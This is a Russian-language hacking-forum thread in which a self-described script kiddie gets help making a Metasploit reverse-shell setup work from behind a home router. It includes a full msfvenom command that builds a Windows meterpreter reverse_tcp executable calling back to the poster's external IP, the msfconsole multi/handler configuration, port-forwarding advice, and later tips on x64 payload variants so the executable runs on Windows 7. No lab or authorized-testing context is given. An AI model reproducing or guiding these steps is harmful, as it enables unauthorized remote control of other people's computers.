PDA

Просмотр полной версии : Проблема с Metasploit


Vovo4ka
09.02.2018, 16:29
Доброго времени суток. Возникла проблема с Metasploit'oм. Хотя, если задуматься, то виноват вовсе не он.

Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524. Простая попытка открыть порт через iptables, разумеется, не дала ничего. Я, начитавшись информации про ошибку в Метасплоите, которая возникала из-за невозможности подключиться к порту 4444 в гугле, стал сетовать на роутер. Добавил на нем правило, пробросив этот порт. Однако ничего не изменилось.

Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет. Думаю попробовать банально удалить эту утиллиту, но мне интересно, сталкивался ли кто-либо с подобным? И как исправлял?

Ах да, подобная трабла наблюдается у меня минимум на трех устройствах: ПК, ноутбук и телефон (!) с установленным termux.

dmax0fw
09.02.2018, 18:55
Vovo4ka said:
↑ (https://antichat.live/posts/4182305/)
Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет


nmap его не видит, а просто сообщает какая служба обычно использует этот порт, не конкретно на твоей машине,а вообще


Vovo4ka said:
↑ (https://antichat.live/posts/4182305/)
Простая попытка открыть порт через iptables, разумеется, не дала ничего


порт открывает программа, которая собирается с ним работать, iptables лишь разрешает или запрещает обращаться к этому порту


Vovo4ka said:
↑ (https://antichat.live/posts/4182305/)
Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524


он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт на другом интерфейсе

Vovo4ka
09.02.2018, 19:00
dmax0fw said:
↑ (https://antichat.live/posts/4182345/)
он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт только на интерфейсе localhost


То есть handler может работать только с локальными адресами?

dmax0fw
09.02.2018, 19:10
Vovo4ka said:
↑ (https://antichat.live/posts/4182352/)
То есть handler может работать только с локальными адресами?


нет

в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс

Vovo4ka
09.02.2018, 19:20
dmax0fw said:
↑ (https://antichat.live/posts/4182357/)
нет
в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс


Ну, роутер отпадает: я пробросил порт 4444. Машины разные, сомневаюсь, что на всех одна и та же проблема с файрволом возможна. Значит, дело в самом Метасплоите. Хорошо, спасибо, буду разбираться

VY_CMa
09.02.2018, 19:28
То есть handler может работать только с локальными адресами?


Он может работать даже с 0.0.0.0

lsof -i | grep 4444

Vovo4ka
09.02.2018, 19:36
VY_CMa said:
↑ (https://antichat.live/posts/4182362/)
lsof -i | grep 4444




Code:
root@kali:~# lsof -i | grep 4444
root@kali:~#

VY_CMa
09.02.2018, 20:21
Какой модуль используешь для запуска?

Vovo4ka
09.02.2018, 20:25
VY_CMa said:
↑ (https://antichat.live/posts/4182386/)
Какой модуль используешь для запуска?


multi/handler

Jerri
10.02.2018, 00:49
Vovo4ka said:
↑ (https://antichat.live/posts/4182388/)
Пардон, если не так понял (ибо скрипткидди): multi/handler


pkill -9 ruby и после попробуй запускать.

Vovo4ka
10.02.2018, 21:45
Jerri said:
↑ (https://antichat.live/posts/4182523/)
pkill -9 ruby и после попробуй запускать.


Не дало решительным образом ничего.

.SpoilerTarget" type="button">Spoiler


Code:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop Documents Downloads programm.exe Music Pictures Public Templates Videos
root@kali:~# pkill -9 ruby
root@kali:~# msfconsole
__________________________________________________ ____________________________
| |
| 3Kom SuperHack II Logon |
|_________________________________________________ _____________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|_________________________________________________ _____________________________|
| |
| https://metasploit.com |
|_________________________________________________ _____________________________|

=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler/
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 109.---.--.---
LHOST => 109.---.--.---
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
Exploit running as background job 0.

[-] Handler failed to bind to 109.252.62.124:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > exit

dmax0fw
11.02.2018, 05:26
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali

но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе

а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444

если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект

а дальше уже плясать от этого

Vovo4ka
11.02.2018, 19:57
dmax0fw said:
↑ (https://antichat.live/posts/4182845/)
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali


А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер?


dmax0fw said:
↑ (https://antichat.live/posts/4182845/)
а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект


Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out.

Ладно, буду изучать в этом направлении подробней. Спасибо!

dmax0fw
11.02.2018, 20:58
Vovo4ka said:
↑ (https://antichat.live/posts/4183063/)
А какой тогда?


локальный ip машины на которой запущен метасплоит

вижу ты не совсем понимаешь суть проброса портов

когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip

метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов

ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит

Vovo4ka
11.02.2018, 21:02
dmax0fw said:
↑ (https://antichat.live/posts/4183076/)
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит


Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо

Vovo4ka
12.02.2018, 20:35
dmax0fw said:
↑ (https://antichat.live/posts/4183076/)
локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит


http://s1.radikale.ru/uploads/2018/2/12/b0b1b0918e6cfcaf8765321b37dd3194-full.png

Верно ли я настроил проброску?

Vovo4ka
12.02.2018, 21:48
Есть! Handler запустился и работает (вроде как)! Спасибо! Посмотрю, будет ли нормально работать.

Vovo4ka
14.02.2018, 21:27
Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?

Sensoft
14.02.2018, 22:03
разрядность винды какая ?

Vovo4ka
14.02.2018, 22:06
Sensoft said:
↑ (https://antichat.live/posts/4184404/)
разрядность винды какая ?


Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.

Sensoft
14.02.2018, 22:07
Vovo4ka said:
↑ (https://antichat.live/posts/4184405/)
Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.


если не 64 тогда скорей в этом

Vovo4ka
16.02.2018, 16:43
Sensoft said:
↑ (https://antichat.live/posts/4184406/)
если не 64 тогда скорей в этом


То есть не-х64 версии Windows он не может брать?

Sensoft
16.02.2018, 16:49
Vovo4ka said:
↑ (https://antichat.live/posts/4185021/)
То есть не-х64 версии Windows он не может брать?


я не помню

вроде как, а может и нет, загугли глянь

у меня 8.1 64x всё збс работает

Jerri
16.02.2018, 19:38
Vovo4ka said:
↑ (https://antichat.live/posts/4185021/)
То есть не-х64 версии Windows он не может брать?


-p /windows/meterpreter/reverse_tcp

-p /windows/x64/meterpreter/reverse_tcp

Vovo4ka
16.02.2018, 21:28
Jerri said:
↑ (https://antichat.live/posts/4185057/)
-p /windows/meterpreter/reverse_tcp
-p /windows/x64/meterpreter/reverse_tcp


Merci!